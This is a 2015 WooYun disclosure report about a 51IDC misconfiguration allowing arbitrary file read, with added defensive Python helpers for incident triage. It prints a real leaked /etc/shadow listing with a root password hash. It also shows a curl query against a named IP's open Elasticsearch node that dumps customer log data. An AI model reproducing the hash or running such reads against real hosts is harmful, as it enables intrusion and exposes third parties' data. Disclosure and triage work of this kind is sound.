Vulnerability summary (followers: 24)
Defect ID: wooyun-2015-0112618
Title: 51IDC: a misconfiguration leads to arbitrary file read
Vendor: 51IDC (安畅网络)
Author: izy
Submitted: 2015-05-07 14:46
Fixed: 2015-06-25 10:38
Disclosed: 2015-06-25 10:38
Vulnerability type: disclosure of important sensitive information
Severity: high
Self-assessed Rank: 10
Status: confirmed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-05-07: details sent to the vendor, awaiting vendor handling
2015-05-11: vendor confirmed; details disclosed to the vendor only
2015-05-21: details disclosed to core white hats and domain experts
2015-05-31: details disclosed to regular white hats
2015-06-10: details disclosed to intern white hats
2015-06-25: details disclosed to the public
Brief description:
Arbitrary file read
Detailed description:
IP source: http://wooyun.org/bugs/wooyun-2010-0108219
Read the shadow file directly
root:$6$7gdIDbHJ$M3ozjM1jcGyxjwS7mKakC79OHIys7TchDKZ0KYOwYqruDBQsp2D3og/pam8rQecwxNGIUy8vZsCUtpspLLi3L1:16506:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
operator:*:15513:0:99999:7:::
games:*:15513:0:99999:7:::
gopher:*:15513:0:99999:7:::
ftp:*:15513:0:99999:7:::
nobody:*:15513:0:99999:7:::
dbus:!!:16506::::::
vcsa:!!:16506::::::
abrt:!!:16506::::::
haldaemon:!!:16506::::::
ntp:!!:16506::::::
saslauth:!!:16506::::::
postfix:!!:16506::::::
sshd:!!:16506::::::
tcpdump:!!:16506::::::
apache:!!:16506::::::
mysql:!!:16506::::::
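Added example (not part of izy's report): an incident-response helper in Python that parses shadow lines of the kind listed above and answers the question the host owner has to answer first after such an exposure, namely which accounts carry a real, now-leaked password hash and must be rotated, as opposed to locked (`*`, `!!`) or password-less entries. The sample lines and the root hash in them are constructed placeholders, not the exposed values; the crypt prefix table is standard Linux crypt(3) notation.

```python
"""Incident-response triage for a leaked /etc/shadow (added example, not from the report).

Given the lines of a shadow file that has been exposed, decide which accounts
actually carry a password hash (and so need rotation) versus accounts that are
locked or password-less, and decode the last-change field.
"""
from datetime import date, timedelta

# Constructed sample in the same layout as the report's listing; the hashes are
# placeholders, not the values that were exposed.
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDER:16506:0:99999:7:::
bin:*:15513:0:99999:7:::
sshd:!!:16506::::::
deploy:$1$abcdefgh$PLACEHOLDERMD5HASH:16400:0:99999:7:::
"""

# crypt(3) hash prefixes; $1$ and $5$/$6$ are the common ones on 2015-era Linux hosts.
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                 "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt", "$y$": "yescrypt"}


def classify_hash_field(field):
    """Return (state, algorithm) for the second shadow field.

    state is one of 'locked' (* or ! with nothing usable behind it), 'nopass'
    (empty field), 'hashed', or 'locked-hashed' (passwd -l style: a real hash
    behind a leading '!', which is still a leaked secret).
    """
    locked = field.startswith("!")
    body = field.lstrip("!")
    if body in ("", "*"):
        return ("locked" if locked or body == "*" else "nopass"), None
    algo = next((a for p, a in HASH_PREFIXES.items() if body.startswith(p)), "unknown")
    return ("locked-hashed" if locked else "hashed"), algo


def lastchange_to_date(days_field):
    """Field 3 is days since 1970-01-01; an empty field means never set."""
    if days_field == "":
        return None
    return date(1970, 1, 1) + timedelta(days=int(days_field))


def parse_shadow(text):
    """Parse shadow lines into dicts; lines without the nine fields are skipped, not guessed."""
    entries = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 9:
            continue
        state, algo = classify_hash_field(parts[1])
        entries.append({
            "user": parts[0],
            "state": state,
            "algorithm": algo,
            "last_change": lastchange_to_date(parts[2]),
        })
    return entries


def accounts_needing_rotation(text):
    """Accounts whose secret is compromised: anything that carries a real hash.
    Locked and password-less accounts cannot be logged into with a password."""
    return [e["user"] for e in parse_shadow(text)
            if e["state"] in ("hashed", "locked-hashed")]


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        print(f"{e['user']:<10} {e['state']:<14} {e['algorithm'] or '-':<12} {e['last_change']}")
    print("rotate:", accounts_needing_rotation(SAMPLE_SHADOW))
```

Run against the listing above, the helper reports only root as needing rotation (SHA-512 crypt, last changed on day 16506, i.e. 2015-03-12); every other entry is a locked system account.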
izy@Macintosh:~$ curl http://58.215.139.37:9200/_search?pretty
{
"took" : 17,
"timed_out" : false,
"_shards" : {
"total" : 62,
"successful" : 62,
"failed" : 0
},
"hits" : {
"total" : 12634697,
"max_score" : 1.0,
"hits" : [ {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "TNBplZdJTku7WjZkIfjyAg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.809Z","host":"127.0.0.1:49082","type":"datalog","status":1,"node_label":"网内节点","domain":"financecity.org","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":65,"data":"58.215.186.121","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":65,"dlabel":"金程国际financecity.org","glabel":"金程国际","group_id":54,"qtype":"A","domain_id":65,"time_total":9.943}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "AOkUKSZ1TPmdh77v4RAGiw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.819Z","host":"127.0.0.1:49087","type":"datalog","status":1,"node_label":"网内节点","domain":"gfedu.net","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":66,"data":"58.215.186.122","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":66,"dlabel":"金程国际gfedu.net","glabel":"金程国际","group_id":54,"qtype":"A","domain_id":66,"time_total":11.96}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "7GE713ACSTi9Xgtv6pY3Nw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.844Z","host":"127.0.0.1:49090","type":"datalog","status":1,"node_label":"网内节点","domain":"gpst.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":37,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":4.935,"ping_id":37,"dlabel":"上海华东人才gpst.cn","glabel":"上海华东人才","group_id":30,"domain_id":37,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "KoEfvHN7QyWqXh8l9RFhpw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.862Z","host":"127.0.0.1:49091","type":"datalog","status":1,"node_label":"网内节点","domain":"www.lillyoncology.com.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":32,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":6.177,"ping_id":32,"dlabel":"礼来国际www.lillyoncology.com.cn","glabel":"礼来国际","group_id":23,"domain_id":32,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "fXEd4gQWQP2ymF8fMg7LFg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.867Z","host":"127.0.0.1:49092","type":"datalog","status":1,"node_label":"网内节点","domain":"www.sunflowerclub.com.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":33,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":6.87,"ping_id":33,"dlabel":"礼来国际www.sunflowerclub.com.cn","glabel":"礼来国际","group_id":23,"domain_id":33,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "pI668m_vS6CvonzA18AFBg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.867Z","host":"127.0.0.1:49094","type":"datalog","status":1,"node_label":"网内节点","domain":"www.huadong.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":38,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":7.537,"ping_id":38,"dlabel":"上海华东人才www.huadong.cn","glabel":"上海华东人才","group_id":30,"domain_id":38,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "-GgISu37T5qn6G7bnEe4CA",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49096","type":"datalog","status":1,"node_label":"网内节点","domain":"www.niwodai.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":4,"data":"61.160.209.154","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":4,"dlabel":"上海嘉银www.niwodai.com","glabel":"默认","group_id":1,"qtype":"A","domain_id":4,"time_total":13.463}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "_2OC78h4R5ONSZPZcwJ6aQ",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49095","type":"datalog","status":1,"node_label":"网内节点","domain":"www.louisfenysh.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":77,"data":"114.80.110.203","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":77,"dlabel":"上海欧晴www.louisfenysh.com","glabel":"上海欧睛","group_id":60,"qtype":"A","domain_id":77,"time_total":10.156}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "L4yFkCY9QNG6hr-q-za1nQ",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49097","type":"datalog","status":1,"node_label":"网内节点","domain":"www.huadong.net.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":39,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":8.239,"ping_id":39,"dlabel":"上海华东人才www.huadong.net.cn","glabel":"上海华东人才","group_id":30,"domain_id":39,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "bnYfZxh1Sv6XaRR9o7kvsw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.872Z","host":"127.0.0.1:49109","type":"datalog","status":1,"node_label":"网内节点","domain":"0019.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":98,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":7.146,"ping_id":98,"dlabel":"相亲相爱02","glabel":"济南相亲相爱","group_id":16,"domain_id":110,"errmsg":""}
} ]
}
}
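Added example (not from the report, and not Elasticsearch's own code): a Python triage helper for the `_search` response an unauthenticated node returns, of the kind shown above. It reports the document count the node claims, the indices, types and fields present, how many sampled hits fall in each `category`, IP-looking values, and the fields that identify customers, so the exposure can be sized before anyone is notified. The embedded response is a constructed sample in the same shape as the output above; the list of identifier field names is an assumption about what counts as customer-identifying here.

```python
"""Triage of an unauthenticated Elasticsearch _search response (added example,
not code from the report). Given the JSON that an open node returns, summarise
what a stranger on the network can read: how many documents, which indices and
types, which fields, and which values look like internal hosts or customer
identifiers."""
import json
import re

# Constructed sample in the same shape as the report's curl output; values are
# invented, not the ones that were exposed.
SAMPLE_RESPONSE = json.dumps({
    "took": 17, "timed_out": False,
    "_shards": {"total": 62, "successful": 62, "failed": 0},
    "hits": {"total": 12634697, "max_score": 1.0, "hits": [
        {"_index": "logstash-2015.03.11", "_type": "datalog", "_id": "id-1",
         "_source": {"@timestamp": "2015-03-10T16:00:01.809Z", "host": "127.0.0.1:49082",
                     "category": "dns", "domain": "customer-a.example", "data": "10.0.0.5",
                     "user_id": 10001, "glabel": "Customer A"}},
        {"_index": "logstash-2015.03.11", "_type": "datalog", "_id": "id-2",
         "_source": {"@timestamp": "2015-03-10T16:00:01.844Z", "host": "127.0.0.1:49090",
                     "category": "ping", "domain": "customer-b.example",
                     "user_id": 10002, "glabel": "Customer B", "errmsg": ""}},
        {"_index": "logstash-2015.03.12", "_type": "datalog", "_id": "id-3",
         "_source": {"@timestamp": "2015-03-11T16:00:01.868Z", "host": "127.0.0.1:49096",
                     "category": "dns", "domain": "customer-a.example", "data": "10.0.0.7",
                     "user_id": 10001, "glabel": "Customer A"}},
    ]},
})

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?$")
# Field names that usually identify a customer or a person (assumed list; flagged, not proven).
IDENTIFIER_FIELDS = {"user_id", "glabel", "dlabel", "domain", "email", "username"}


def summarize_exposure(raw_json):
    """Return an exposure summary for one _search response.

    total_documents is the count the node claims for the whole query, not the
    handful of hits in one page of results."""
    doc = json.loads(raw_json)
    hits = doc.get("hits", {})
    total = hits.get("total")
    if isinstance(total, dict):          # ES 7+ returns {"value": n, "relation": "eq"}
        total = total.get("value")
    indices, types, fields = set(), set(), set()
    ip_values, identifier_fields, customers, categories = set(), set(), set(), {}
    for hit in hits.get("hits", []):
        indices.add(hit.get("_index"))
        if "_type" in hit:               # mapping types exist in 1.x/2.x/5.x responses
            types.add(hit["_type"])
        src = hit.get("_source", {})
        fields.update(src)
        identifier_fields.update(IDENTIFIER_FIELDS & set(src))
        if "glabel" in src:
            customers.add(src["glabel"])
        cat = src.get("category")
        if cat is not None:
            categories[cat] = categories.get(cat, 0) + 1
        for v in src.values():
            if isinstance(v, str) and IPV4.match(v):
                ip_values.add(v)
    return {
        "total_documents": total,
        "indices": sorted(indices),
        "types": sorted(types),
        "fields": sorted(fields),
        "identifier_fields": sorted(identifier_fields),
        "categories": categories,
        "ip_values": sorted(ip_values),
        "distinct_customers": sorted(customers),
    }


def is_open_search_endpoint(raw_json):
    """True when the body has the shape of a successful _search, i.e. the node
    answered a query with no authentication. Error bodies carry "error" instead."""
    try:
        doc = json.loads(raw_json)
    except ValueError:
        return False
    return "error" not in doc and isinstance(doc.get("hits"), dict) and "hits" in doc["hits"]


if __name__ == "__main__":
    print(json.dumps(summarize_exposure(SAMPLE_RESPONSE), indent=2))
    print("open:", is_open_search_endpoint(SAMPLE_RESPONSE))
```

On the real response the figure that matters is `hits.total` of 12634697: the ten documents in the page are a sample, and the node is offering every document in its 62 shards to anyone who can reach port 9200. Patching, as the author recommends, is necessary; the usual companion is to bind `network.host` to a non-public address and put authentication in front of the HTTP port.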
Proof of vulnerability:
Remediation:
Apply the patch.
Copyright notice: credit the source when reposting. izy@乌云
Vendor response
Vendor response:
Severity: high
Vulnerability Rank: 10
Confirmed: 2015-05-11 10:37
Vendor reply:
Thanks for the attention! Handled.
Latest status:
None